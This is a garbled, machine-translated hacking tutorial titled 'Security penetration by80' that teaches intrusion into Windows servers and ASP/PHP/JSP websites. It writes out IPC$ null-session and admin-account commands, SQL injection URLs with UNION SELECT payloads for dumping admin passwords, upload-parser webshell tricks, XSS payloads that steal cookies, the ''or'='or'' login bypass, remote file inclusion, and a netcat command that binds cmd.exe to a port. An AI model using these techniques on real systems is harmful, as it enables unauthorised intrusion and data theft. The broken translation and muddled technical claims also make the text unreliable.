Security penetration by80

 
Chapter 1: Port commands

1. port. This is an easy-to-understand word. There are a total of 65535 computer ports, but only dozens of ports are actually used. Common ports


135,445,590, 3389, 80, 53, etc. The port is like a chimney of a house. If it is opened, it may face some risks, such, this is the port for Remote Desktop. It is mainly used in two aspects. One is to implement network interaction. One computer is connected to the desktop of another computer, and the other is used by hackers, the command is mstsc, and port 3389 intrusion implements this function, while port 3389 is for Windows XP's system empty password. That is to say, if the password of Windows XP is empty, if port 3389 is enabled, hackers can remotely exploit it if it is scanned by a hacker. The hacker uses an IP address to remotely connect to the database. In the window, enter the administrators and the password is empty, you can see the desktop of the other side, but 3389 has a drawback. If the other side finds that the mouse is moved, the Remote Desktop will be closed. The empty password and the empty connection are different. The empty connection is an IPC null connection in the format of net use \ IP \ IPC $ ""/User: "admin ", this means that when the passwords are empty, a blank connection is made to the target address. If the connection succeeds, a ing function can be implemented. net use Z: \ IP \ C $, this is the remote ing function, which maps the drive C of the target server to the local drive Z, and the drive letter of the other server. We can access the content of the target server C on the local drive Z. Enabling the 3389 server is the remote connection in the system settings. You can check the remote connection.


Ports 4899,4899 are similar to the 3389 mode, while ports 4899 are connected through the Ramin shadow server. Ports 4899 are usually for users with empty passwords. If the vulnerability exists, you can remotely connect to the Shadow server to achieve remote control.


Port 135,135 is an overflow port. If it is in an Internet cafe, run the netstat-An command to check which ports are open. Generally, internet cafes have opened ports 135 and 445. Malicious users will use remote control software to generate Trojans. After the Intranet ing is successful, they can batch upload Trojans to other machines, as a result, many computers have become bots.


Ports 5900,5900 are generally targeted at foreign servers. Attackers can use VNC connector to Perform Batch detection on 5900 foreign servers. This method requires VPN proxy technology, and SYN is usually used for scanning, saving TCP latency


1433. You must be familiar with port 1433. That's right. It's the port of SQL Server, while port 1433 is usually used to detect weak SA passwords, 1433 The Connection Tool plays this role. The caller can obtain the password file, enter the user name and password, and the database name, remotely connect to the other party's database, and then execute the SQL Privilege Escalation command, the server intrusion is successfully achieved.


3306. MySQL port. The vulnerability storage directory is usually Conn. ASP config. PHP common. inc. PHP contains the root directory of the website, and the caller obtains this data. Generally, there are two directions: 1. MySQL database detaching, 2. MySQL Elevation of Privilege, mySQL database disconnection is targeted at the Forum server and member data. MySQL is used to remotely connect to the database. Generally, the Select * from Members table is located and the file SQL is exported to the local machine, the detailed member data is stored in it. MySQL Elevation of Privilege is to improve permissions. You need to export the DLL file of the Registry and then execute the SQL command to add a management group. Generally, when the MySQL database is greater than 5.0, the export must be the installation directory, if it is less than 5 or 0, it can be exported to: C:/Windows/UDF. DLL, because the later version has made some restrictions!


Command is also equally important, such as Windows and Linux system commands, MS-DOS environment commands, the approximate command should remember


Win: Net user add Add/Add net localgroup administrators Add/Add add to manage group account


View the detailed path of the current system process in WMIC Process


ARP-A: view the MAC address of the current system


Tracert-D route Tracing


Ping test command


Systeminfo view system configuration information


MD Ren RD: create a directory, rename the directory, and delete the Directory


Netstat-V is working.-A: Check the current listening port.-N: the connection in progress.-An: check which ports are open.


At scheduled tasks




Chapter II: web script Security


Web script security is also a top priority of network security. How can we understand Script Security?


First, we need to understand the website type and architecture, such as ASP Website, PHP website, JSP website, aspx website, CGI, etc.


General security is usually: ASP --> PHP --> aspx --> JSP -- <


We can see that ASP has the lowest security. We all know that the program of a website is designed by programmers.


Vulnerabilities may occur. Once a vulnerability exists, it will be successfully exploited by some people. This is the security of web scripts.


You have a certain understanding of Web security and are proficient in web attack and defense technologies.


 


The server administrator sets up the website to the Internet to enable multi-person access, so the server is open. Since the external network communication function is available


In this case, Script Security is born. The birth of one technology also means the derivation of another technology, such as assembly and disassembly.


The virtual sites set up by external websites are checked one by one to discover vulnerabilities.


 


Principle: Remote writing of a script Trojan to the root directory of the server website through a programming vulnerability, and then connecting to the external path address to form a web backdoor.


Advantage: SERVER one-way penetration means exceptions, and Script Security is replaced by the way in which the shell permission is obtained through the script and then the server is upgraded.


ASP Website vulnerability analysis:


 


ASP websites are generally used in small enterprises.


Common vulnerabilities: SQL Injection, database explosion, directory traversal, unauthorized access, upload, weak password, social engineering, XSS, editor, Cookie, Or, FTP, poor effort


SQL vulnerability cause: Variable filtering is lax,


Database explosion is caused by failure to write Fault-Tolerant code


Test Method for injection: and 1 = 1 and 1 = 2. The prerequisite is dynamic website instead of static website.


Open a news dynamic page on the website, and click Submit.


Http://www.baidu.com/asp/asp? Id = 30% 20and % 201 = 1 normal


Http://www.baidu.com/asp/asp? Id = 30% 20and % 201 = 2 error


Injection, tool injection, and manual injection are acceptable.


You need to guess the table, table name, column name, and user, and finally obtain the password.


The passwords are generally in hexadecimal encryption and need to be decrypted on a dedicated MD5 website.


There are two types of database explosion: conn database explosion % 5c database explosion % 23 database explosion


The conn database burst because the Administrator did not prevent external personnel from accessing the file.


Causing access: the http://www.adminx.com/admin/conn.asp will see a specific path to the database if an error is reported


The http://www.adminx.com/inc/config.asp is generally prohibited


Http://www.adminx.com/inc/conn.asp is generally Blank


% 5c is the database Explosion Method of the level-2 Directory


Format: http://www.admin.com/asp/uid? Id = 1 normal page


Http://www.admin.com/asp/%5cuid? Id = 1 if successful, "Download Database" will pop up"





% 23 is for database explosion


We know that the expression format of the database is www.xxx.com/data www.xxx.com/database www.xxx.com/datas.


These are usually 403 forbidden. If we know the truth of the database


Expression: After the http://www.xxx.com/databases/#xin_wenku.mdb is accessed, the forbidden page is displayed


Mdb database download will pop up after http://www.xxx.com/databases/%23xin_wenku.mdb access


 


Directory Traversal means that the Administrator has no restrictions on the access to sub-directory permissions under the root directory of the website.


As a result, the caller can access these directories and use the information collected in the next step as necessary.


Expression: http: www.xxx.com/manage/./ directory traversal, you can see many directories


Unauthorized access means that the Administrator has no restrictions on the permissions of the Background File pages under the directory file, so that the caller can access the page anonymously.


It is very dangerous to go to the background of the system. The caller sometimes intrude into a site


Expression: http://www.xxx.com/manage/asp/edit.moneyasp? Id = #


Possible pages: News Publishing Page, Administrator adding page, member list page, website layout page, etc.


Upload vulnerabilities, that is, website Image Upload points. Some upload addresses are very confidential. They are used for user groups to upload images, pictures, or company PDF, xls, and Doc files, but some people use it


There are many common Upload Vulnerability pages, including: gif89a image Trojan camouflage, one-sentence vulnerability, IIS Parsing


 


Expression: http://www.xxx.com/include/upload.jsp http://www.com/include_admin/upload.asp http://www.com/upload_class.asp


 


For example, the user saves the source code of the upload page to the local notepad, writes the source code to gif89a In the first line, and submits the image.


You can also use a one-sentence Trojan to merge it into the image. For example, the previous nginx vulnerability was implemented using the IIS two-way resolution function.


Expression: http://www.xxx.com/php/ass/1.jpg/ this image address. If it can be properly displayed, access 0x. php again.


Http://www.xxx.com/php/ass/1.jpg/0x.php will appear blank, you will find nothing, in fact, the backdoor is successful!


Connect to the PHP client using a one-sentence Trojan, and enter the password to upload the script Trojan to the root directory of the website to obtain the webshell permission.


Resolution expression: 1.asp).jpg 1.jpg. asp 2.asa0000.gif 0x0000x.jpg00000x0000y.jpg


This means that although the end is in the image format, it will execute this image through ASP, ASA, which is actually equivalent to executing our script Trojan!


 


Weak passwords. For some websites, administrators generally set passwords too simple. passwords such as 123,456,123 456 admin admin888 admin123 may be cracked by hackers.


The website security is threatened!




Social Engineering: This is a very powerful technology. He needs to master and gain insight into the psychological status of his people. It actually means 'psychological Cracker ", such as cracking a mailbox, he needs to collect all the information available to the master, analyze the daily status and habits of the master, and finally crack the password! Many bookstores also sell such books at around 30-40 yuan!




XSS is a type of passive attack, generally XSS cross-site attacks and XSS blind attacks.


Basic expression: <SCRIPT> alert ("1") </SCRIPT> dialog box: 1


<SCRIPT> alert (document. Cookie) </SCRIPT> the cookie value is displayed.


<SCRIPT> window. Open ("http://baidu.com") </SCRIPT> open Baidu website




Cross-site expression: www.xxx.com/asp/asp? Id = "> <SCRIPT> alert (" 0 ") </SCRIPT>


Trojan Cross-Site EXPRESSION www.xxx.com/asp/asp? Id = <IFRAME src = "url"> 0x </iframe> needs to convert it to hex format


Dynamic expressions embedded in the framework: www.xxx.com/asp/asp? Id = <IFRAME src = "url"> 0x </iframe> <marquee> Hello </marquee>




The blind hitting technology is to write a JS Code for itself. Through the message page, the Administrator will generally review such information. When he clicks it, the cookie will be automatically saved to our backdoors.


Expression: http://www.xxx.com/cookie/cookie.asp


 


Editor vulnerabilities, which may occur very early. They are generally divided into eweb and FCKeditor vulnerabilities.


The editor background is generally ewebeditor/admin_login.asp


Ewebeditor/ewebeditor. aspx ewebeditor/ewebeditor.htm ewebeditor/ewebeditor. asp? Id = 1 ewebeditor/admin_style.asp


Ewebeditor/admin/DB/# ewebeditor. mdb, ewebeditor/DB/# ewebedior1033.mdb


The password is admin888 admin admin999.


 


FCKeditor Vulnerability


 


There are also many ways to use


Php cms can use the editor to upload and obtain permissions.


Http: // www. XXX. com/admin/FCKeditor /../.../../


Cookis transit. This vulnerability is caused by another injection method, called Cookie injection, when SQL Injection fails.


Preparation tools: Small tornado ASP environment, injection and table guessing tools


First, set the environment port to 82 or 81.


Next, find a page to generate the 127 page.


Contrast expression: http://www.xxx.com/asp/aasp? Id = 1 injection failed


Http: // 127.0.0.1: 81/root address/post submit value can be injected


Or vulnerability, well-known 'or' = 'or' Vulnerability


For the background management systems of some asp websites, all user passwords are entered with either 'or' = 'or'


If successful, you can directly enter the background


User: 'or' = 'or'


Name: 'or' = 'or'


 


FTP vulnerabilities generally occur in two features: Anonymous Access and weak passwords.


Expression: anonymous ftp://www.xxx.com access, directly entering


Weak Password: ftp: www.cc.com User: ftp pass: [email protected] enter the password


For example, if a TXT file is put in FTP, the content is written as 1.


You can also access HTTP: wwww.cc.com/1.txt


The brute-force method is generally used to crack system brute-force cracking. It collects many off-the-shelf dictionaries, passwords for a mailbox, QQ, or the background of a website,


It takes a long time to initiate a specified cracking!


PHP website Vulnerability Analysis


 


Generally, vulnerabilities are injected first,


Representation: http://www.ccc.com/asp/php? Id = 10% 20 order % 20by % 201 guess Field


Http://www.ccc.com/asp/php? Id = 10% 20 order % 20by % 2018 normal


Http://www.ccc.com/asp/php? Id = 10% 20 order % 20by % 2020 Error


19 fields can be determined, 19 fields are spelled in the address in turn, 3 common variables, database () version user ()


You need to know the conversion of the three functions, C:/win. ini load_file (), you can also use hex (mid function for read path) during injection)


Path expression: D:/wwwroot/PHP/uC/config. php


Expression: http://www.ccc.com/asp/php? Id = 10% 20and % 1 = 2% 20 Union % 20 select 1, 2, 3, 4, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 the page shows normal as successful


Http://www.ccc.com/asp/php? Id = 10% 20and % 1 = 2% 20 Union % 20 select, 19 from Admin if the error page cannot be found


Http://www.ccc.com/asp/php? Id = 10% 20and % 1 = 2% 20 Union % 20 select 1, 2, 3, 4, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 from admin_user the page is normally found, it usually displays a few numbers, such as 3, 6, 8, and so on. We generally take 3 and 6


Http://www.ccc.com/asp/php? Id = 10% 20and % 1 = 2% 20 Union % 20 select 1, 2, user (), from admin_user view User: [email protected]
Http://www.ccc.com/asp/php? Id = 10% 20and % 1 = 2% 20 Union % 20 select, version, from admin_user to view the database version. A database larger than 5 or 0 can be cracked.


Http://www.ccc.com/asp/php? Id = 10% 20and % 1 = 2% 20 Union % 20 select, Databse (), from admin_user view the Database Name


Http://www.ccc.com/asp/php? Id = 10% 20and % 1 = 2% 20 Union % 20 select 1, 2, user, 4, 5, password, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19. The from admin_user page is normal, that is, to guess the user and password. Otherwise, Error 404 is returned.


Http://www.ccc.com/asp/php? Id = 10% 20and % 1 = 2% 20 Union % 20 select, load_file (read ini address), from admin_user


Http://www.ccc.com/asp/php? Id = 10% 20and % 1 = 2% 20 Union % 20 select, Hex (MID), from admin_user


 


There is also the oday of some system source code, such as the online forum, the old y article system, the mobile science, fengxun, dedecms dream, the Empire CMS


And so on. In general, some of these vulnerabilities are exp injection, some require get shell, build the PHP environment by yourself, and then enter the command execution vulnerability in the DOS window, such as the open-source tool MSF, is the integrated overflow platform, which can be called directly through the command: Show exploits




In addition, the PHP File Inclusion Vulnerability exists.


Expression format: http://www.a.com/asp/id=http://www. B .com/1.php


That is to say, the permissions obtained at point A are read from the source code system to point B. In this way, point B is used, and we get the permissions of B in this way.


But the premise is to get the permission first at!


Including aspx, sometimes a CER form vulnerability or a universal Password Vulnerability occurs.




JSP Vulnerability Analysis




JSP is generally used in banking and news portals. Security is relatively high for outsiders. However, although JSP security is the highest, it should be noted that in the Elevation of Privilege technology, JSP has the largest permissions, but ASP anonymous permissions are reduced compared with insecure ASP websites! MySQL may also experience downgrading!


 


Vulnerabilities are generally found in the JS verification not filtered.


Cause upload


Second-level domain name Upload Vulnerability


Expression: http: www.xx.gov.cn http://ad.xx.gov.cn/upload.asp http://svx.xx.gov.com/upload.php


<Form>


<Form action = "sadd. jsp" method = "Post"> <br/>


<Input type = "file"> <br/>


<Input type = "Submit" value = "Go! ">


</Form>


Backend management permission Technology


If we use a simple password test to enter the background of our website, we can use various methods to obtain webshell permissions.


For example, database backup, packet capture, packet modification, address building, two uploads, parsing, direct upload, and so on


Supported formats: GIF, BMP, and jpg


Prohibited formats: CER, ASP, PHP, JSP, and aspx


The birth of the bypass vulnerability, that is, many domain names are bound on the website server, including shopping network, talent network, and news network. Our goal is news network. However, no many vulnerabilities have been found in the test, at this time, we can start with the talent network to check and finally obtain the permissions of the news network through the cross-directory or aspx IIS permission read and write.




CIDR block, which can be expressed by IP addresses. a cidr block contains 255 machines ranging from 210.44.123.1 to 219.44.123.255. For example, the target address of the caller is 210,44, 123,5.


At this time, we only need to detect a server in this segment and then perform sniffing on the server. If the target of the other party does not have a firewall installed, it will be sniffed, this is how servers are used in the isolated state.




Expression: A: "B:"


 


-- A target server


B ++ finds a server in the same network segment in segment B


B ++ = A finally sniffed the data and finally directed to target


 


Hijacking and spoofing are completed in both Cain and net fucer.


Hijacking is generally divided into Domain Name Hijacking and ARP hijacking.


Generally, a server in the same CIDR block is the same as a server in the C segment, but the difference is that it uses hijacking.


That is to say, if a spoofing traffic package is sent to the target server, the homepage file is automatically changed to the desired content after the server is cheated.


Spoofing is generally ARP or DNS Spoofing. ARP spoofing is mainly used to spoof the 3389 host file of the target machine, in text format.


You can use the c32 Disassembly tool to open it and you can clearly see that the user and password are leaked behind the address.


Server Elevation of Privilege


In a self-built shell website, if you do not escalate permissions, you cannot proceed to the next step.


Therefore, we need to learn the Elevation of Privilege technology.


However, the Elevation of Privilege technology generally applies to win Linux respectively.


Common tools: Brazilian barbecue, PR kill, NC listener, LCX forwarding, win2003 kernel overflow, IIS6, 0, MS, EXE, shift Backdoor


Elevation of Privilege


1. Check the website permissions, such as ASP anonymous permissions, whether aspx is supported


2. Check whether the WC component is supported.


3. In general, the permissions for the recycle bin and temp directories are relatively large.


4. Check config, ASP, And Conn. ASP Password


5. Check the file of the fxp transfer tool.


5. Check whether PCAnywhere is installed.


6. Whether to install the sertu FTP Server


7. Check whether port 3389 is enabled.


8. Check whether the directory file program can be replaced.


9. Check whether the Ramin password exists.


10. Check whether JSP permissions are supported.


This is an Internet method. In the case of an intranet, You need to forward it. First, you must listen locally and then send it to 3389. Use the local 127 address: the listening port to connect to the other party 3389.


NC rebound command: C:/winodws/nc.exe-l-P 5858-t-e c:/Windows/cmd.exe
Another one is shell code, where the road starts!

Security penetration by80